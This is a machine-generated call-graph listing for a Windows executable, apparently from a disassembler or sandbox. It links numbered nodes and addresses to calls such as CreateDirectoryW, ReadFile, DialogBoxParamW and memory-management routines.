12864->12810 12865->12814 12872 403204 free 12866->12872 12868 401d66 12873 403204 free 12868->12873 12870 401d47 12870->12864 12871 403204 free 12870->12871 12871->12864 12872->12868 12873->12870 12875 402a03 __EH_prolog 12874->12875 12876 40368d 2 API calls 12875->12876 12877 402a12 12876->12877 12878 40368d 2 API calls 12877->12878 12879 402a1e 12878->12879 12983 402a4c 12879->12983 12882 40368d 2 API calls 12883 402504 12882->12883 12883->12472 12885 4026cb __EH_prolog 12884->12885 12886 40368d 2 API calls 12885->12886 12887 4026e6 12886->12887 12888 404daf 16 API calls 12887->12888 12889 4026f9 12888->12889 12890 40271d 12889->12890 12891 4026fd 12889->12891 12995 4028c3 12890->12995 12892 4038d0 3 API calls 12891->12892 12893 40270e 12892->12893 13101 403204 free 12893->13101 12897 4037d2 3 API calls 12899 402764 12897->12899 12898 4028b3 12898->12485 12999 40afa7 12899->12999 12902 4027b6 12904 403740 2 API calls 12902->12904 12903 40278e 12905 4038d0 3 API calls 12903->12905 12906 4027c2 12904->12906 12907 40279f 12905->12907 12908 4055bc 4 API calls 12906->12908 13078 403204 free 12907->13078 12910 4027ce 12908->12910 13028 40448c 12910->13028 12911 4027a7 13079 403204 free 12911->13079 12915 4027af 13095 402f4a 12915->13095 12916 40282a 12919 4036f3 2 API calls 12916->12919 12917 4027da 13080 40b7fd 12917->13080 12921 402837 12919->12921 13048 401d71 12921->13048 12924 4037d2 3 API calls 12926 4027fb 12924->12926 13088 403204 free 12926->13088 12929 402865 13056 40d4b4 12929->13056 12930 402803 13089 403204 free 12930->13089 12933 402815 13090 403204 free 12933->13090 12936 40281d 13091 403204 free 12936->13091 12937 40288d 13093 403204 free 12937->13093 12940 402895 13094 403204 free 12940->13094 12944 402b6f __EH_prolog 12943->12944 14023 403204 free 12944->14023 12946 402b88 14024 402af8 12946->14024 12950 402baa 14037 403204 free 12950->14037 12952 4013e2 12952->12207 12952->12208 12954 402bcb __EH_prolog 12953->12954 12955 40368d 2 API calls 12954->12955 12956 402bf7 12955->12956 12957 40368d 2 API calls 12956->12957 12958 402c03 12957->12958 12959 40368d 2 API calls 12958->12959 12960 402c0f 12959->12960 12961 40368d 2 API calls 12960->12961 12962 402c1f 12961->12962 14048 402c56 12962->14048 12965 40368d 2 API calls 12966 402c3a 12965->12966 12966->12479 12968 418aa4 12967->12968 12969 418aa9 GetLastError 12967->12969 12968->12484 12970 418ab3 12969->12970 12970->12484 12972 4037d2 3 API calls 12971->12972 12973 402665 12972->12973 14066 4061f9 DialogBoxParamW 12973->14066 12975 402670 14067 418a70 WaitForSingleObject 12975->14067 12977 40267a 12978 4026ae 6 API calls 12977->12978 12979 402687 SetWindowTextW 12978->12979 14068 403204 free 12979->14068 12981 40269a ShowWindow 12981->12500 12982->12502 12984 402a56 __EH_prolog 12983->12984 12985 40368d 2 API calls 12984->12985 12986 402a8b 12985->12986 12989 402aa6 12986->12989 12990 402ab0 __EH_prolog 12989->12990 12991 40368d 2 API calls 12990->12991 12992 402add 12991->12992 12993 40368d 2 API calls 12992->12993 12994 402a2e 12993->12994 12994->12882 12996 4028d3 12995->12996 12997 40368d 2 API calls 12996->12997 12998 40273d 12997->12998 12998->12897 13000 40afb1 __EH_prolog 12999->13000 13001 4031dd 2 API calls 13000->13001 13002 40afcb 13001->13002 13003 40afdd 13002->13003 13170 40b121 13002->13170 13005 40368d 2 API calls 13003->13005 13006 40b00c 13005->13006 13007 40368d 2 API calls 13006->13007 13008 40b018 13007->13008 13009 40b049 13008->13009 13102 40488c 13008->13102 13123 40a90a 13009->13123 13015 40b076 13178 403204 free 13015->13178 13017 40b0ee 13181 403204 free 13017->13181 13018 40b07e 13179 403204 free 13018->13179 13021 40b0f6 13182 403204 free 13021->13182 13022 403632 2 API calls 13026 40b09a 13022->13026 13024 403089 4 API calls 13024->13026 13025 402784 13025->12902 13025->12903 13026->13017 13026->13022 13026->13024 13180 403204 free 13026->13180 13029 404496 __EH_prolog 13028->13029 13030 404da0 GetFileAttributesW 13029->13030 13032 4044a1 13030->13032 13031 4027d6 13031->12916 13031->12917 13032->13031 13033 4036b0 2 API calls 13032->13033 13035 4044d7 13033->13035 13034 4044fe 13036 403740 2 API calls 13034->13036 13035->13034 13037 4044f7 13035->13037 13044 404514 13036->13044 13690 403204 free 13037->13690 13040 404527 GetLastError 13041 4045a6 13040->13041 13040->13044 13689 403204 free 13041->13689 13043 4045b2 13043->13037 13044->13040 13044->13041 13046 404570 13044->13046 13677 4045cd 13044->13677 13045 40382a 3 API calls 13045->13046 13046->13041 13046->13045 13688 40447d CreateDirectoryW 13046->13688 13049 4037d2 3 API calls 13048->13049 13050 401d98 13049->13050 13051 4037d2 3 API calls 13050->13051 13052 401dc4 13051->13052 13053 4055bc 4 API calls 13052->13053 13054 401dcb 13053->13054 13055 403204 free 13054->13055 13055->12929 13059 40d4be __EH_prolog 13056->13059 13057 4031dd 2 API calls 13060 40d5c4 13057->13060 13058 40287f 13092 403204 free 13058->13092 13059->13057 13059->13058 13061 4031dd 2 API calls 13060->13061 13062 40d629 13061->13062 13062->13058 13063 40d694 13062->13063 13064 40d6ec 13062->13064 13068 40d835 13062->13068 13071 40d47f 30 API calls 13062->13071 13072 40d8fa 13062->13072 13073 40d9ac 13062->13073 13075 40da25 13062->13075 13699 40d16c 13062->13699 13702 40bd85 13062->13702 13065 40dc5d free 13063->13065 13693 40dc5d 13064->13693 13065->13058 13070 40dc5d free 13068->13070 13070->13058 13071->13062 13074 40dc5d free 13072->13074 13076 40dc5d free 13073->13076 13074->13058 13077 40dc5d free 13075->13077 13076->13058 13077->13058 13078->12911 13079->12915 13081 40b807 __EH_prolog 13080->13081 14001 4026ae 13081->14001 13087 4027eb 13087->12924 13088->12930 13089->12933 13090->12936 13091->12915 13092->12937 13093->12940 13094->12915 13096 402f51 13095->13096 13097 402f63 13096->13097 14021 403204 free 13096->14021 14022 403204 free 13097->14022 13100 402f6a 13100->12893 13101->12898 13183 404821 13102->13183 13105 40376e 3 API calls 13106 4048a6 13105->13106 13107 40376e 3 API calls 13106->13107 13108 4048bf 13107->13108 13109 40b290 13108->13109 13110 40b29a __EH_prolog 13109->13110 13111 4037d2 3 API calls 13110->13111 13112 40b2af 13111->13112 13113 403632 2 API calls 13112->13113 13114 40b2bc 13113->13114 13115 404daf 16 API calls 13114->13115 13116 40b2cb 13115->13116 13246 403204 free 13116->13246 13118 40b2df 13119 40b2e4 _CxxThrowException 13118->13119 13120 40b2f9 13118->13120 13119->13120 13121 4030d0 free 13120->13121 13122 40b301 13121->13122 13122->13009 13124 40a914 __EH_prolog 13123->13124 13247 40a8e3 13124->13247 13126 4037d2 malloc _CxxThrowException free 13169 40a925 13126->13169 13127 40ad22 13129 405def VariantClear 13127->13129 13128 40aef9 13131 405def VariantClear 13128->13131 13167 40a933 13129->13167 13131->13167 13132 40ace8 13133 40ad0e 13132->13133 13359 40a26d 13132->13359 13364 402f6e 13133->13364 13134 405def VariantClear 13134->13169 13135 40b397 malloc _CxxThrowException free memcpy 13135->13169 13139 4037d2 3 API calls 13139->13133 13140 40af06 malloc _CxxThrowException 13140->13169 13142 40ad31 13143 402f6e free 13142->13143 13143->13167 13145 40ad7b 13146 402f6e free 13145->13146 13146->13167 13147 4028c3 2 API calls 13147->13169 13149 40adc5 13150 40a26d 3 API calls 13149->13150 13153 40add7 13150->13153 13151 40ae5c 13378 403204 free 13151->13378 13155 4037d2 3 API calls 13153->13155 13158 40ade6 13155->13158 13156 40ae64 13379 403204 free 13156->13379 13376 403204 free 13158->13376 13159 40ae6c 13161 402f6e free 13159->13161 13161->13167 13162 40adee 13377 403204 free 13162->13377 13163 403204 free ctype 13163->13169 13165 40adf6 13166 402f6e free 13165->13166 13166->13167 13167->13015 13167->13026 13168 402f6e free 13168->13169 13169->13126 13169->13127 13169->13128 13169->13132 13169->13134 13169->13135 13169->13140 13169->13142 13169->13145 13169->13147 13169->13149 13169->13151 13169->13163 13169->13167 13169->13168 13251 40a53f 13169->13251 13285 409683 13169->13285 13302 409616 13169->13302 13306 40a2c8 13169->13306 13355 409863 13169->13355 13171 40b12b __EH_prolog 13170->13171 13172 40368d 2 API calls 13171->13172 13173 40b158 13172->13173 13174 40368d 2 API calls 13173->13174 13175 40b16e 13174->13175 13176 40368d 2 API calls 13175->13176 13177 40b17d 13176->13177 13177->13003 13178->13018 13179->13025 13180->13026 13181->13021 13182->13025 13184 405c84 13183->13184 13187 4058fb 13184->13187 13188 405905 __EH_prolog 13187->13188 13189 40376e 3 API calls 13188->13189 13190 405918 13189->13190 13191 405976 13190->13191 13195 405925 13190->13195 13192 40368d 2 API calls 13191->13192 13193 40597e 13192->13193 13196 405994 13193->13196 13197 405989 13193->13197 13194 404898 13194->13105 13194->13106 13195->13194 13198 4036b0 2 API calls 13195->13198 13236 405ab3 GetCurrentDirectoryW 13196->13236 13199 40376e 3 API calls 13197->13199 13201 40593e 13198->13201 13202 405992 13199->13202 13231 405b0b 13201->13231 13204 4055bc 4 API calls 13202->13204 13230 4059c2 13202->13230 13210 4059a8 13204->13210 13207 405969 13235 403204 free 13207->13235 13209 40399c 4 API calls 13209->13207 13211 40368d 2 API calls 13210->13211 13210->13230 13212 405a28 13211->13212 13213 405a55 13212->13213 13215 405a3b 13212->13215 13214 40376e 3 API calls 13213->13214 13216 405a53 13214->13216 13240 403950 13215->13240 13218 405b0b memmove 13216->13218 13220 405a69 13218->13220 13222 405a7b 13220->13222 13223 405a6d 13220->13223 13221 403950 4 API calls 13221->13216 13225 4037d2 3 API calls 13222->13225 13244 403204 free 13223->13244 13226 405a97 13225->13226 13227 40399c 4 API calls 13226->13227 13228 405aa3 13227->13228 13245 403204 free 13228->13245 13239 403204 free 13230->13239 13233 405b1e 13231->13233 13232 40594a 13232->13207 13232->13209 13233->13232 13234 403c09 memmove 13233->13234 13234->13233 13235->13194 13237 40376e 3 API calls 13236->13237 13238 405af4 13237->13238 13238->13202 13239->13194 13241 403960 13240->13241 13242 40351f 4 API calls 13241->13242 13243 403973 13242->13243 13243->13221 13244->13230 13245->13230 13246->13118 13248 40a8ee 13247->13248 13249 40a908 13248->13249 13380 40b3e1 13248->13380 13249->13169 13252 40a549 __EH_prolog 13251->13252 13253 40a598 13252->13253 13254 40a56b 13252->13254 13256 40a572 13253->13256 13258 4031dd 2 API calls 13253->13258 13255 4031dd 2 API calls 13254->13255 13255->13256 13257 40a2c8 55 API calls 13256->13257 13263 40a63b 13257->13263 13259 40a5a8 13258->13259 13260 4037d2 3 API calls 13259->13260 13262 40a5e4 13260->13262 13261 40a608 13261->13169 13264 4053b3 2 API calls 13262->13264 13263->13261 13387 409111 13263->13387 13265 40a5f1 13264->13265 13265->13256 13267 40a5f5 GetLastError 13265->13267 13267->13261 13268 40a7b5 13396 403204 free 13268->13396 13270 403740 2 API calls 13279 40a6b6 13270->13279 13271 401ef8 4 API calls 13271->13279 13273 40399c 4 API calls 13273->13279 13274 403204 free ctype 13274->13279 13275 4039d8 4 API calls 13275->13279 13276 4037d2 malloc _CxxThrowException free 13276->13279 13277 4053b3 2 API calls 13277->13279 13278 40a891 16 API calls 13278->13279 13279->13268 13279->13270 13279->13271 13279->13273 13279->13274 13279->13275 13279->13276 13279->13277 13279->13278 13280 40a2c8 55 API calls 13279->13280 13281 40a7e5 13279->13281 13390 40a8b7 13279->13390 13280->13279 13397 403204 free 13281->13397 13283 40a7ed 13398 403204 free 13283->13398 13291 40968d __EH_prolog 13285->13291 13286 409746 13289 40975e 13286->13289 13292 409752 13286->13292 13293 40978e 13286->13293 13287 409739 13288 405def VariantClear 13287->13288 13290 409741 13288->13290 13289->13293 13294 40975c 13289->13294 13290->13169 13300 4096e0 13291->13300 13403 40349a 13291->13403 13296 40387d 4 API calls 13292->13296 13295 405def VariantClear 13293->13295 13298 405def VariantClear 13294->13298 13295->13290 13296->13294 13299 409778 13298->13299 13299->13290 13410 4097ac 13299->13410 13300->13286 13300->13287 13300->13290 13303 40963f 13302->13303 13304 405def VariantClear 13303->13304 13305 40966c 13304->13305 13305->13169 13307 40a2d2 __EH_prolog 13306->13307 13430 409dad 13307->13430 13309 40a4ce 13309->13169 13313 40a4e3 VariantClear 13314 40a35e 13313->13314 13314->13309 13315 40a4e3 VariantClear 13314->13315 13316 40a377 13315->13316 13316->13309 13317 40a4e3 VariantClear 13316->13317 13318 40a390 13317->13318 13318->13309 13319 40a4e3 VariantClear 13318->13319 13320 40a3a9 13319->13320 13320->13309 13321 40a4e3 VariantClear 13320->13321 13322 40a3c2 13321->13322 13322->13309 13478 40429a 13322->13478 13325 40368d 2 API calls 13327 40a3e0 13325->13327 13326 40a402 13330 40a482 13326->13330 13331 40a432 13326->13331 13354 40a47d 13326->13354 13327->13326 13328 40376e 3 API calls 13327->13328 13328->13326 13493 409144 13330->13493 13334 40368d 2 API calls 13331->13334 13332 40a4c6 13499 403204 free 13332->13499 13337 40a43a 13334->13337 13338 40368d 2 API calls 13337->13338 13340 40a448 13338->13340 13339 408fcd 4 API calls 13341 40a4a9 13339->13341 13482 408fcd 13340->13482 13343 4037d2 3 API calls 13341->13343 13345 40a4b5 13343->13345 13497 403204 free 13345->13497 13498 403204 free 13354->13498 13356 40986d __EH_prolog 13355->13356 13357 405def VariantClear 13356->13357 13358 4098f0 13357->13358 13358->13169 13360 4037d2 3 API calls 13359->13360 13361 40a2b5 13360->13361 13362 4037d2 3 API calls 13361->13362 13363 40a2c1 13362->13363 13363->13139 13365 402f78 __EH_prolog 13364->13365 13667 403204 free 13365->13667 13367 402f91 13668 403204 free 13367->13668 13369 402f99 13669 403204 free 13369->13669 13371 402fa1 13670 402b4e 13371->13670 13374 402b4e free 13375 402fb4 13374->13375 13375->13167 13376->13162 13377->13165 13378->13156 13379->13159 13381 40b3ff 13380->13381 13382 40b3f2 13380->13382 13381->13248 13383 402f6e free 13382->13383 13384 40b3f9 13383->13384 13386 403204 free 13384->13386 13386->13381 13399 403547 13387->13399 13391 40a8c5 13390->13391 13392 40a8cf 13390->13392 13393 40368d 2 API calls 13391->13393 13394 403740 2 API calls 13392->13394 13395 40a8cd 13393->13395 13394->13395 13395->13279 13396->13261 13397->13283 13398->13261 13400 40355b 13399->13400 13401 4034e7 2 API calls 13400->13401 13402 403565 13401->13402 13402->13279 13404 4034c1 13403->13404 13405 4034ac _CxxThrowException 13403->13405 13406 4031dd 2 API calls 13404->13406 13405->13404 13407 4034cc 13406->13407 13426 403204 free 13407->13426 13409 4034d9 13409->13300 13411 4097b6 __EH_prolog 13410->13411 13427 409675 13411->13427 13414 409839 13414->13290 13415 4037d2 3 API calls 13416 4097f0 13415->13416 13417 409813 13416->13417 13418 40984c 13416->13418 13419 40981e 13416->13419 13421 405def VariantClear 13417->13421 13418->13417 13420 409831 13418->13420 13422 401ef8 4 API calls 13419->13422 13424 405def VariantClear 13420->13424 13421->13414 13423 409827 13422->13423 13425 403950 4 API calls 13423->13425 13424->13414 13425->13420 13426->13409 13428 409616 VariantClear 13427->13428 13429 409680 13428->13429 13429->13414 13429->13415 13431 409db7 __EH_prolog 13430->13431 13432 40429a 2 API calls 13431->13432 13433 409e18 13432->13433 13434 40368d 2 API calls 13433->13434 13436 409e23 13434->13436 13435 409e45 13438 4031dd 2 API calls 13435->13438 13439 409e6f 13435->13439 13436->13435 13437 40376e 3 API calls 13436->13437 13437->13435 13438->13439 13440 409eb5 13439->13440 13450 409ed4 13439->13450 13441 4088fd 4 API calls 13440->13441 13442 409ebe 13441->13442 13461 409fc9 13442->13461 13462 409f7c 13442->13462 13472 406827 3 API calls 13442->13472 13444 40a175 13555 403204 free 13444->13555 13445 409fb4 13445->13462 13473 406827 3 API calls 13445->13473 13447 409144 CharUpperW 13447->13450 13448 40a17d 13556 403204 free 13448->13556 13450->13442 13450->13447 13451 4088fd 4 API calls 13450->13451 13517 40b406 13450->13517 13451->13450 13452 40a185 13557 403204 free 13452->13557 13456 40a18d 13456->13309 13474 40a4e3 13456->13474 13457 40a1bd 13558 403204 free 13457->13558 13460 40a1d6 13559 403204 free 13460->13559 13461->13457 13461->13462 13468 40a26d 3 API calls 13461->13468 13469 406827 3 API calls 13461->13469 13500 409d49 13461->13500 13503 40e520 13461->13503 13509 40ed82 13461->13509 13520 409970 13461->13520 13554 403204 free 13462->13554 13464 40a1de 13560 403204 free 13464->13560 13466 40a1e6 13561 403204 free 13466->13561 13468->13461 13469->13461 13472->13445 13473->13461 13475 40a509 13474->13475 13476 405def VariantClear 13475->13476 13477 40a343 13476->13477 13477->13309 13477->13313 13479 4042ad 13478->13479 13480 4036b0 2 API calls 13479->13480 13481 4042bb 13480->13481 13481->13325 13483 408fd7 __EH_prolog 13482->13483 13638 409020 13483->13638 13494 40916c 13493->13494 13495 40914f 13493->13495 13494->13339 13495->13494 13496 403210 CharUpperW 13495->13496 13496->13495 13497->13354 13498->13332 13499->13309 13562 409d63 13500->13562 13502 409d5c 13502->13461 13504 40e52a __EH_prolog 13503->13504 13505 40ed82 11 API calls 13504->13505 13506 40e583 13505->13506 13508 40e58a 13506->13508 13572 410b21 13506->13572 13508->13461 13510 40ed94 13509->13510 13516 406827 3 API calls 13510->13516 13511 40eda8 13512 40eddf 13511->13512 13515 406827 3 API calls 13511->13515 13512->13461 13513 40edbc 13513->13512 13608 40ebb1 13513->13608 13515->13513 13516->13511 13518 40b6b7 4 API calls 13517->13518 13519 40b40f memmove 13518->13519 13519->13450 13521 40997a __EH_prolog 13520->13521 13522 4099fa 13521->13522 13523 4099ea 13521->13523 13626 409903 13522->13626 13524 405def VariantClear 13523->13524 13553 4099f2 13524->13553 13527 405def VariantClear 13528 409a10 13527->13528 13529 409a48 13528->13529 13530 409a38 13528->13530 13532 409903 _CxxThrowException 13529->13532 13531 405def VariantClear 13530->13531 13531->13553 13533 409a52 13532->13533 13534 405def VariantClear 13533->13534 13535 409a5d 13534->13535 13536 409a95 13535->13536 13537 409a85 13535->13537 13538 409ab3 13536->13538 13541 40376e 3 API calls 13536->13541 13539 405def VariantClear 13537->13539 13540 405def VariantClear 13538->13540 13539->13553 13542 409abb 13540->13542 13541->13538 13543 409af3 13542->13543 13544 409ae3 13542->13544 13546 409b11 13543->13546 13548 40376e 3 API calls 13543->13548 13545 405def VariantClear 13544->13545 13545->13553 13547 405def VariantClear 13546->13547 13549 409b1d 13547->13549 13548->13546 13549->13553 13630 409c0d 13549->13630 13553->13461 13554->13444 13555->13448 13556->13452 13557->13456 13558->13460 13559->13464 13560->13466 13561->13456 13563 409d6d __EH_prolog 13562->13563 13566 410e73 13563->13566 13564 409d84 13564->13502 13567 410e7d __EH_prolog 13566->13567 13568 4031dd malloc _CxxThrowException 13567->13568 13569 410e88 13568->13569 13570 410e9c 13569->13570 13571 40dca3 7 API calls 13569->13571 13570->13564 13571->13570 13573 410b2b __EH_prolog 13572->13573 13578 410864 13573->13578 13576 410b56 _CxxThrowException 13576->13508 13577 410b8d 13577->13508 13579 41086e __EH_prolog 13578->13579 13580 40e6a5 free 13579->13580 13582 410880 13580->13582 13581 41092a 13581->13576 13581->13577 13582->13581 13607 406827 SetFilePointer GetLastError GetLastError 13582->13607 13583 4109c4 13583->13581 13584 4031dd malloc _CxxThrowException 13583->13584 13585 4109e9 13584->13585 13586 407b3a ReadFile GetLastError 13585->13586 13587 4109fe 13586->13587 13589 40e966 _CxxThrowException 13587->13589 13590 410a1d 13587->13590 13600 410a02 13587->13600 13588 403204 ctype free 13588->13581 13589->13590 13591 40ea46 _CxxThrowException 13590->13591 13592 410a5d 13591->13592 13593 410ad6 13592->13593 13594 410a74 13592->13594 13595 40e966 _CxxThrowException 13592->13595 13596 410138 38 API calls 13593->13596 13597 40fe8a 37 API calls 13594->13597 13595->13594 13598 410a9b 13596->13598 13601 410a92 13597->13601 13599 410da8 free 13598->13599 13599->13600 13600->13588 13601->13598 13602 40e966 _CxxThrowException 13601->13602 13603 410aaa 13601->13603 13602->13603 13604 40ea46 _CxxThrowException 13603->13604 13605 410ac8 13604->13605 13605->13593 13606 40e966 _CxxThrowException 13605->13606 13606->13593 13607->13583 13609 40ebbb __EH_prolog 13608->13609 13622 407b3a 13609->13622 13611 40ebd2 13612 4031dd 2 API calls 13611->13612 13618 40ebe5 13611->13618 13613 40ec0c memcpy 13612->13613 13614 40ec2a 13613->13614 13615 40ece9 13614->13615 13616 40eccb memmove 13614->13616 13619 40ecee memcpy 13614->13619 13620 406749 2 API calls 13614->13620 13625 403204 free 13615->13625 13616->13614 13618->13512 13621 406827 3 API calls 13619->13621 13620->13614 13621->13615 13623 407aee ReadFile GetLastError 13622->13623 13624 407b4d 13623->13624 13624->13611 13625->13618 13627 40990b 13626->13627 13628 40991f _CxxThrowException 13627->13628 13629 409934 13627->13629 13628->13629 13629->13527 13631 409c17 __EH_prolog 13630->13631 13632 405def VariantClear 13631->13632 13633 409b4e 13632->13633 13633->13553 13634 409cab 13633->13634 13637 409cb5 __EH_prolog 13634->13637 13635 405def VariantClear 13636 409d36 13635->13636 13636->13553 13637->13635 13667->13367 13668->13369 13669->13371 13675 403204 free 13670->13675 13672 402b59 13676 403204 free 13672->13676 13674 402b61 13674->13374 13675->13672 13676->13674 13691 418d80 13677->13691 13679 4045d7 CreateDirectoryW 13680 4045f0 GetLastError 13679->13680 13681 4045ec 13679->13681 13680->13681 13682 404601 13680->13682 13681->13044 13683 40368d 2 API calls 13682->13683 13684 404611 13683->13684 13685 404daf 16 API calls 13684->13685 13686 40461d 13685->13686 13692 403204 free 13686->13692 13688->13046 13689->13043 13690->13031 13691->13679 13692->13681 13694 40dc67 __EH_prolog 13693->13694 13788 403204 free 13694->13788 13696 40dc8e 13697 40c85f free 13696->13697 13698 40dc96 13697->13698 13698->13058 13789 40d342 13699->13789 13703 40bd8f __EH_prolog 13702->13703 13793 40f0a2 13703->13793 13788->13696 13791 40d345 13789->13791 13790 40d191 30 API calls 13790->13791 13791->13790 13792 40d18e 13791->13792 13792->13062 13868 40ee2c 13793->13868 13895 40eb3d 13868->13895 13871 40ee4a _CxxThrowException 13872 40ee5e 13871->13872 13900 410bf8 13872->13900 13874 40ee67 13879 40efa6 _CxxThrowException 13874->13879 13883 40efba _CxxThrowException 13874->13883 13886 40eb3d _CxxThrowException _CxxThrowException 13874->13886 13892 40ef87 13874->13892 13912 40e9b4 13874->13912 13916 407ab8 13874->13916 13922 40e9d2 13874->13922 13927 403204 free 13874->13927 13877 40ef9c 13879->13883 13883->13877 13886->13874 13928 410c85 13892->13928 13934 40ea46 13895->13934 13898 40eb51 _CxxThrowException 13899 40eb65 13898->13899 13899->13871 13899->13872 13901 410c02 __EH_prolog 13900->13901 13902 410c6f 13901->13902 13903 4031dd 2 API calls 13901->13903 13905 410c31 13901->13905 13902->13874 13903->13905 13905->13902 13940 40d0d8 13905->13940 13913 40e9c4 13912->13913 13914 40e9bf 13912->13914 13913->13874 13923 40ea03 13922->13923 13924 40e9de 13922->13924 13923->13874 13927->13874 13935 40ea62 13934->13935 13936 40ea71 13935->13936 13938 40e966 _CxxThrowException 13935->13938 13936->13898 13936->13899 13939 40e97e 13938->13939 13939->13936 13941 40d109 13940->13941 13944 40d0e5 13940->13944 13949 40d123 13941->13949 13947 40d103 13944->13947 13948 403204 free 13944->13948 13947->13902 13948->13947 14002 405e4f 6 API calls 14001->14002 14003 4026bc 14002->14003 14004 40b78a 14003->14004 14005 40b794 __EH_prolog 14004->14005 14006 403740 2 API calls 14005->14006 14007 40b7a7 14006->14007 14008 4036b0 2 API calls 14007->14008 14009 40b7b8 14008->14009 14010 403b7d 8 API calls 14009->14010 14011 40b7cb 14010->14011 14019 403204 free 14011->14019 14013 40b7d7 14014 403740 2 API calls 14013->14014 14015 40b7e3 14014->14015 14020 403204 free 14015->14020 14017 40b7eb 14018 403204 free 14017->14018 14018->13087 14019->14013 14020->14017 14021->13096 14022->13100 14023->12946 14025 402b02 __EH_prolog 14024->14025 14026 40a8e3 free 14025->14026 14027 402b15 14026->14027 14028 402b4e free 14027->14028 14029 402b21 14028->14029 14038 403204 free 14029->14038 14031 402b29 14032 410da8 free 14031->14032 14033 402b36 14032->14033 14039 402ef9 14033->14039 14036 403204 free 14036->12950 14037->12952 14038->14031 14040 402f03 __EH_prolog 14039->14040 14043 402f6e free 14040->14043 14044 402f33 14040->14044 14047 403204 free 14040->14047 14042 402b41 14042->14036 14043->14040 14046 403204 free 14044->14046 14046->14042 14047->14040 14049 402c60 __EH_prolog 14048->14049 14050 40368d 2 API calls 14049->14050 14051 402c83 14050->14051 14058 402d15 14051->14058 14055 402cba 14056 402c2b 14055->14056 14057 402cbe _CxxThrowException 14055->14057 14056->12965 14057->14056 14065 418b70 InitializeCriticalSection 14058->14065 14060 402c97 14061 418b00 CreateEventW 14060->14061 14062 418b21 GetLastError 14061->14062 14063 418b1e 14061->14063 14064 418b2b 14062->14064 14063->14055 14064->14055 14065->14060 14066->12975 14067->12977 14068->12981 14070 40193a wcscmp 14069->14070 14071 401909 14069->14071 14070->14071 14071->12518 14072 404826 SetCurrentDirectoryW 14071->14072 14072->12518 14073->12523 14074->12515 14076 404020 14075->14076 14077 40403d 14075->14077 14076->14077 14078 401d5b ctype free 14076->14078 14109 403204 free 14076->14109 14077->12553 14078->14076 14081 403e51 __EH_prolog 14080->14081 14082 4033ad 2 API calls 14081->14082 14089 403e67 14082->14089 14083 403ea0 14110 4033cf 14083->14110 14085 403eac 14113 403204 free 14085->14113 14087 403eb4 14087->12553 14088 401b7e 5 API calls 14088->14089 14089->14083 14089->14088 14091 403fbe __EH_prolog 14090->14091 14092 4031dd 2 API calls 14091->14092 14093 403fca 14092->14093 14094 403740 2 API calls 14093->14094 14095 403ff4 14093->14095 14096 403fe4 14094->14096 14097 4088fd 4 API calls 14095->14097 14098 403740 2 API calls 14096->14098 14099 404005 14097->14099 14098->14095 14099->12553 14100->12535 14101->12537 14102->12530 14103->12543 14104->12547 14105->12551 14106->12530 14107->12552 14108->12556 14109->14076 14114 403376 14110->14114 14112 4033df 14112->14085 14112->14112 14113->14087 14115 4031dd 2 API calls 14114->14115 14116 40338a 14115->14116 14116->14112 14117->12576 14119 405f9b 14118->14119 14120 405f8b 14118->14120 14124 405ee5 14119->14124 14121 40376e 3 API calls 14120->14121 14123 405f99 14121->14123 14123->12223 14125 405ef6 14124->14125 14126 405f08 LoadStringW 14125->14126 14127 40349a 4 API calls 14125->14127 14126->14125 14128 405f1d 14126->14128 14127->14126 14128->14123 14130 404401 14129->14130 14131 404346 14129->14131 14132 40376e 3 API calls 14130->14132 14131->12601 14131->12606 14133 40440b LocalFree 14132->14133 14133->14131 14134->12607 14135->12613 14136->12624 14138 404682 __EH_prolog 14137->14138 14139 40368d 2 API calls 14138->14139 14140 4046a6 14139->14140 14141 404daf 16 API calls 14140->14141 14142 4046b7 14141->14142 14143 4046e0 14142->14143 14144 4046d3 SetLastError 14142->14144 14181 4046bb 14142->14181 14182 403204 free 14143->14182 14144->14181 14146 4046c3 14146->12349 14148 4046fa 14150 403740 2 API calls 14148->14150 14175 4047e4 14148->14175 14152 40470e 14150->14152 14151 4047ee 14151->14146 14199 404470 RemoveDirectoryW 14151->14199 14153 401ef8 4 API calls 14152->14153 14155 40471b 14153->14155 14156 40368d 2 API calls 14155->14156 14157 40472e 14156->14157 14183 4051f7 14157->14183 14159 40473e 14198 404462 SetFileAttributesW 14175->14198 14192 403204 free 14181->14192 14182->14148 14184 4037d2 3 API calls 14183->14184 14185 405206 14184->14185 14186 401ef8 4 API calls 14185->14186 14187 40520f 14186->14187 14187->14159 14192->14146 14198->14151 14199->14146 14210->12655 14212 403bf0 wcscmp 14211->14212 14213 403c02 14211->14213 14212->14213 14213->12666 14215 403a4e 14214->14215 14215->12666 14217 403c20 14216->14217 14218 403c51 14217->14218 14219 403c28 memmove 14217->14219 14218->12666 14219->14218 14221 403b4c 14220->14221 14223 403b56 14220->14223 14224 4033f4 14221->14224 14223->12666 14225 40351f 4 API calls 14224->14225 14226 403402 memmove 14225->14226 14226->14223 14227->12678 14230 417f4e 14232 417ef9 14230->14232 14232->14230 14233 418a70 WaitForSingleObject 14232->14233 14237 418ac0 SetEvent GetLastError 14232->14237 14238 4189e0 EnterCriticalSection LeaveCriticalSection 14232->14238 14239 4187e8 14232->14239 14240 4188f0 EnterCriticalSection LeaveCriticalSection 14232->14240 14241 418840 14232->14241 14245 418890 EnterCriticalSection 14232->14245 14248 418800 14232->14248 14252 4178d0 EnterCriticalSection 14232->14252 14233->14232 14237->14232 14238->14232 14240->14232 14242 418882 14241->14242 14243 418858 14241->14243 14242->14232 14243->14242 14255 406516 14243->14255 14246 4188ae LeaveCriticalSection 14245->14246 14246->14232 14250 418808 14248->14250 14249 418816 14249->14232 14250->14249 14251 418a80 2 API calls 14250->14251 14251->14249 14253 417938 LeaveCriticalSection 14252->14253 14254 417915 14252->14254 14253->14232 14254->14253 14256 40652f 14255->14256 14258 4075fa 7 API calls 14256->14258 14257 406543 14257->14243 14258->14257 14259 413870 14260 413874 free 14259->14260 14261 41387f 14259->14261 14260->14261 14262 4137d0 14263 4137d4 14262->14263 14264 4137d7 malloc 14262->14264 14265 4137f0 free 14266 4131f0 14267 41320b 14266->14267 14268 413222 14267->14268 14270 4131b0 14267->14270 14271 4131ba 14270->14271 14275 4131d8 14271->14275 14276 413780 free 14271->14276 14273 4131c9 14277 413760 14273->14277 14275->14268 14276->14273 14278 413764 14277->14278 14279 413767 malloc 14277->14279 14278->14275 14279->14275 14280 407bfe 14283 407c03 14280->14283 14282 407c21 14283->14282 14284 418ac0 2 API calls 14283->14284 14286 418a70 WaitForSingleObject 14283->14286 14287 40810e 14283->14287 14284->14283 14286->14283 14288 408118 __EH_prolog 14287->14288 14291 40814d 14288->14291 